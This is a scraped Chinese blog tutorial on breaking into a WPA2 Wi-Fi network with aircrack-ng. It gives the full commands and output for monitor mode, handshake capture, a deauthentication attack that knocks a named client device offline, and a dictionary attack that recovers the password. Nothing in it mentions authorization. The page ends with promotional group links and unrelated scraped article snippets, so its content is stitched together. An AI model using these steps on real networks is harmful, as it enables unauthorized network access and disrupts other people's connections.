相关文件

关注小编,私信小编领取哟!
当然别忘了一件三连哟~~

公众号:Python日志
可以关注小编公众号,会不定时的发布一下Python小技巧,还有很多资源可以免费领取哟!!
源码领取:加Python学习交流群:494958217 可以领取哟

1. Install | 安装 aircrack-ng

On Debian/Ubuntu using apt to install: | 使用相应包管理工具安装,例如 Debian/Ubuntu 使用 apt 安装:

sudo apt install aircrack-ng

2. View available wireless network cards | 查看可用的无线网卡

Use the command | 使用命令:airmon-ng

netcon@conwlt:~/workspace$ sudo airmon-ngPHY    Interface   Driver      Chipsetphy0 wlp8s0      iwlwifi     Intel Corporation Centrino Wireless-N 2230 (rev c4)

The available wifi card is wlp8s0 | 根据以上输出,可用的无线网卡为 wlp8s0。

3. Specify the wireless network card to turn on the monitor mode | 指定无线网卡开启监听模式。

使用命令:airmon-ng start <网卡名称>

Use the command airmon-ng start wlp8s0netcon@conwlt:~/workspace$ sudo airmon-ng start wlp8s0PHY Interface   Driver      Chipsetphy0 wlp8s0      iwlwifi     Intel Corporation Centrino Wireless-N 2230 (rev c4)(mac80211 monitor mode vif enabled for [phy0]wlp8s0 on [phy0]wlp8s0mon)(mac80211 station mode vif disabled for [phy0]wlp8s0)

Now wlp8s0 is available for monitoring as wlp8s0mon | 根据以上输出,已经把 wlp8s0 这块无线网卡开启监听模式,开启后名字是 wlp8s0mon。

开启监听模式后无线网卡无法继续连接 wifi,使用后需要关闭监听模式。

With the monitor mode active the card can not be used to connect to any wifi, you have to stop it later to use as a normal card

4. Scan for nearby wireless networks | 扫描附近的无线网络

使用命令:airodump-ng <处于监听模式的网卡名称>

Use the command airodump-ng wlp8s0monnetcon@conwlt:~/workspace$ sudo airodump-ng wlp8s0monCH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49              BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID22:47:DA:62:2A:F0  -50       51       12    0   6  54e. WPA2 CCMP   PSK  AndroidAP    BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -31    0 -24e     0       16

这一步会输出两个列表,两个列表不停在刷新。

第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:

  • BSSID: 无线 AP 的硬件地址
  • PWR: 信号强度,值是负数,绝对值越小表示信号越强
  • CH: 无线网络信道
  • ENC:加密方式,我们要破解的是
  • WPA2 ESSID: 无线网络的名称

第二个列表表示某个无线网络中和用户设备的连接信息:

  • BSSID: 无线 AP 的硬件地址
  • STATION: 用户设备的硬件地址

扫描列表会不停刷新,确定最终目标后按 Ctrl-C 退出。

这里仅仅是演示,所以列表只保留了一条结果。

5. 使用参数过滤扫描列表,确定扫描目标

使用命令:airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>

netcon@conwlt:~/workspace$ sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlp8s0monCH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49 ][ WPA handshake: 22:47:DA:62:2A:F0BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID22:47:DA:62:2A:F0  -33 100     1597      387   11   6  54e. WPA2 CCMP   PSK  AndroidAPBSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -32    1e-24e  1691     2657

刚扫描时看到输出的扫描状态是这样的:CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49。

只有当扫描状态后面出现 ][ WPA handshake: 22:47:DA:62:2A:F0 后,我们才拿到拿到进行破解的握手包。

扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。

所以我们可以同时使用 aireplay-ng 对目标设备进行攻击,使其掉线重新连接,这样我们就拿到了握手包。

拿到握手包后按 Ctrl-C 结束扫描即可。

6. 使用 aireplay-ng 对目标设备发起攻击

使用命令:aireplay-ng -<攻击模式> <攻击次数> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称>

netcon@conwlt:~$ sudo aireplay-ng -0 0 -a 22:47:DA:62:2A:F0 -c AC:BC:32:96:31:8D wlp8s0mon
18:57:31  Waiting for beacon frame (BSSID: 22:47:DA:62:2A:F0) on channel 6
18:57:32  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [41|64 ACKs]
18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [19|121 ACKs]
18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [11|80 ACKs]
...

发起攻击后,当 airodump-ng 成功拿到了握手包,使用 Ctrl-C 退出攻击。

7. 使用 aircrack-ng 暴力破解 Wi-Fi 密码

使用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>

netcon@conwlt:~/workspace$ aircrack-ng -w wpa-dictionary/common.txt android-01.cap
Opening android-01.cap
Read 675 packets.#  BSSID              ESSID                     Encryption1  22:47:DA:62:2A:F0  AndroidAP                 WPA (1 handshake)Choosing first network as target.Opening android-01.cap
Reading packets, please wait...Aircrack-ng 1.2 rc4[00:00:00] 12/2492 keys tested (828.33 k/s) Time left: 2 seconds                                       0.48%KEY FOUND! [ 1234567890 ]Master Key     : A8 70 17 C2 C4 94 12 99 98 4B BB BE 41 23 5C 0D 4A 3D 62 55 85 64 B2 10 11 79 6C 41 1A A2 3B D3 Transient Key  : 58 9D 0D 25 26 81 A9 8E A8 24 AB 1F 40 1A D9 ED EE 10 17 75 F9 F1 01 EE E3 22 A5 09 54 A8 1D E7 28 76 8A 6C 9E FC D3 59 22 B7 82 4E C8 19 62 D9 F3 12 A0 1D E9 A4 7C 4B 85 AF 26 C5 BA 22 42 9A EAPOL HMAC     : 22 C1 BD A7 BB F4 12 A5 92 F6 30 5C F5 D4 EE BE

根据以上输出,我们已经破解成功!Wi-Fi 密码是:1234567890

8. 无线网卡退出监听模式

使用命令:airmon-ng stop <处于监听模式的无限网卡名称>

netcon@conwlt:~/workspace$ sudo airmon-ng stop wlp8s0monPHY Interface   Driver      Chipsetphy0 wlp8s0mon   iwlwifi     Intel Corporation Centrino Wireless-N 2230 (rev c4)(mac80211 station mode vif enabled on [phy0]wlp8s0)(mac80211 monitor mode vif disabled for [phy0]wlp8s0mon)

总结

暴力破解,其实说白了就是一个一个秘密去尝试,只不过是电脑在尝试不是我们人工在弄,所以也不是很难理解!!

Python基于WPA/WPA2 密码字典,实现 wifi 密码暴力破解相关推荐

  1. Kali 下wpa2安全 下的WiFi密码解

    Kali 下wpa2安全 下的WiFi密码解 这段时间沉迷与黑客技术无法自拔,当一名炫酷的黑客是每个男孩儿时的梦想,但是这条路也是艰辛的,孤独的,就看你有没有那个恒心一直走下去.现在网络很发达有很多的 ...

  2. android app wifi密码,无广告查看wifi密码的软件-WiFi密码查看清爽版app下载V999安卓版-西西软件下载...

    WiFi密码查看清爽版app是一款利用系统接口来查看链接的WiFi密码应用,实现密码查看功能的软件,WiFi密码查器看还聚合多种wifi辅助工具,wifi测速.流量统计.wifi信号增强.设备扫描.应 ...

  3. 忘记无线服务器密码怎么查,wifi密码忘记了要怎么查看?

    问:wifi密码忘记了要怎么查看? 自己家里的wifi,把密码忘记了,有什么办法可以查看到原来的wifi密码吗? 答:无线wifi密码,是在无线路由器中进行设置和保存的. 所以,当你忘记wifi密码的 ...

  4. 4g串口服务器怎么改无线密码,移动路由器怎么改密码 移动无线WIFI密码修改方法【详解】...

    [移动路由器改密码]移动路由器怎么改密码 移动无线WIFI密码怎么改 移动wifi怎么改密码? 1.看是用的那一家的路由器,你可以看一下背面的标签: 2. 打开浏览器,在里面输入上面的那个两个地址其中 ...

  5. Java版 凯撒密码 加密、解密、暴力破解

    Java版 凯撒密码 加密.解密.暴力破解 用Java实现凯撒密码的 '加密' 和 '解密' 工作 代码实现如下: 代码片 package com.hellow.demo;import java.ut ...

  6. Mac电脑如何设置wifi热点及密码; 如何删除Wi-Fi密码

    Mac电脑如何设置wifi热点及密码 System Preferences(设置)->Sharing(分享)->Internet Sharing"互联网共享"-> ...

  7. Android之可以做的两件坏事---破解锁屏密码和获取Wifi密码

    转载:http://blog.csdn.net/jiangwei0910410003/article/details/41800409 之前的文章一直在介绍OC,最近也是在找急忙慌的学习IOS,所以A ...

  8. 忘记计算机网络域名密码,自己家里wifi密码忘记了怎么办?

    问:自家里wifi密码忘记了怎么办? 请问下,自己家wifi密码忘记了,有什么办法可以找回wifi密码? 答:wifi密码忘记了,对于很多新手用户来说,确实是一个头疼的问题. 但是,也不用担心,下面鸿 ...

  9. linux没有无线wifi密码忘记,无线wifi密码忘记了怎么办_忘记无线网密码怎么办?-192路由网...

    在本文中,鸿哥主要给大家介绍,无线wifi密码忘记了的解决办法. 因为现在的手机.笔记本电脑等无线设备,在连接某个无线网络后,会自动把wifi密码保存下来,不用我们每次都手动输入wifi密码. 正是因 ...

  10. 手机怎么查看已经记住的WiFi密码?手机查看wifi密码三种方法介绍(图文)

    有时候用过的wifi密码手机自动保存了,但在想知道wifi密码是多少,相信很多人都不记得了,或者在使用其他人的WiFi时,密码突然忘记了.怎么办呢?手机怎么查看已经记住的WiFi密码?下面脚本之家小编 ...

最新文章

  1. 服务器市场步步为营:Intel发布新款至强Xeon E5-4600v4四路处理器
  2. 2020陕西高考全省理科最高分725、文科最高分700
  3. 平面最接近点对问题(分治)
  4. CSS文件可维护、可读性提高指南第2/2页
  5. C#异步编程看这篇就够了
  6. amd cpu不能在cmd环境下运行java代码_如何在Windows10中配置java的JDK环境
  7. 免费解决vcruntime140.dll文件缺失 - 资源篇
  8. 【Go学习笔记2】go语言中的基本数据类型和包的介绍(一)
  9. 企业信息化必看,跨国集团采购部门的报表系统是怎样的
  10. 地图分析--广度搜索
  11. go语言 Accept error: accept tcp [::]:5551: too many open files;
  12. 2019计算机二级vb考试大纲,2019年全国计算机二级VB试题
  13. windows 启动 cmd快捷键,类似于 linux “Ctrl+Alt+T“ 启动终端
  14. 程序员小抄——GitHub 热点速览 Vol.44
  15. python中什么是继承_Python中的继承是什么意思?
  16. 基于大佬的代码实现看板娘效果(三段代码实现)
  17. 编程java摇号购房,用java编写摇号器
  18. 安卓熊猫视频压缩器v1.1.51高级版
  19. 8月份补丁更新:微软修补了121个安全漏洞
  20. Hive 中的复合数据结构简介以及一些函数的用法说明

热门文章

  1. BosonNLP情感词典 评论情感分析
  2. 诺基亚c7微信 服务器忙,诺基亚C7怎么刷机
  3. win10 安装SQL Server 2005--以及---安装SQL2005之后卸载,重新安装时提示“安装默认报表服务器的必备组件检查失败”的方法
  4. java web登录代码_Java Web 登录页面的实现代码实例
  5. Golang | Go 语言 编程练习 100题
  6. 国内电影票务系统浅析
  7. vulhub靶场sql注入漏洞复现
  8. 学生成绩管理系统(C语言版)
  9. Java项目——Everything 开发思路
  10. java6 64位_java6下载-java6官方版下载v6.0 最新64位免费版-旋风软件园